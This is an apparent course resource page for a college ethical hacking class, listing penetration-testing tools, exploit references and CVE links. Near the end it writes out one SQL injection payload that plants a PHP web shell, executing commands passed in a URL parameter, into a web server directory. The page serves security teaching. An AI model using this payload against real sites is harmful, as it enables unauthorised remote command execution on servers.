SFCC CYBR 320 Ethical Hacking - Section 01 - Class Nbr 19817

SFCC logo

SFCC

ccs-spokane zoom

sfcc iscs-vcenter

sfcc iscs-vxr-vcntr

webvpn ccs portal

azure portal

cengage

Description

This course will prepare students with a working knowledge of how hackers attack networks and digital assets. The course will focus on penetration testing, intrusion detection, social engineering and malware investigation. CompTIA PenTest+ Certification All-in-One Exam Guide (Exam PT0-001) 1st Edition by Raymond Nutting Shawn Hafen

Tools

wireshark

filezilla

nmap

burp suite

metasploit

nessus

hydra

foxyproxy

OWASP Juice Shop

sql-injection detect list by fuzzdb-project

CyberChef

censys / shodan

OSINT Framework

maltego

zmap

recon-ng

tenable

aircrack-ng

Nikto

References

PenTest+ pathway for TryHackMe

CompTIA PenTest+

OWASP

Ethical Hacking & System Defense - YouTube

Kenobi

Active Directory

mitre cve / cve.org

exploit-db

Full Disclosure

bugtraq

/robots.txt / security.txt

/.well-known/

Reverse Shell Cheat Sheet

Bind and reverse shells

GTFOBins

winPEAS | linPEAS

pkexec-cve-2021-4034 | cve-2021-4034 xplt

nicedoor

7780699 union all select "<title>nicedoor</title><h1>nice door</h1><pre><?php echo  htmlspecialchars(shell_exec($_GET['cmd']), ENT_QUOTES);?></pre>" into OUTFILE '/var/www/html/swancorp/nicedoor.php';#

Exploit-db list

47169

44298

41458

43418

© 2019/2021-12 Stephen Pollei -- Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)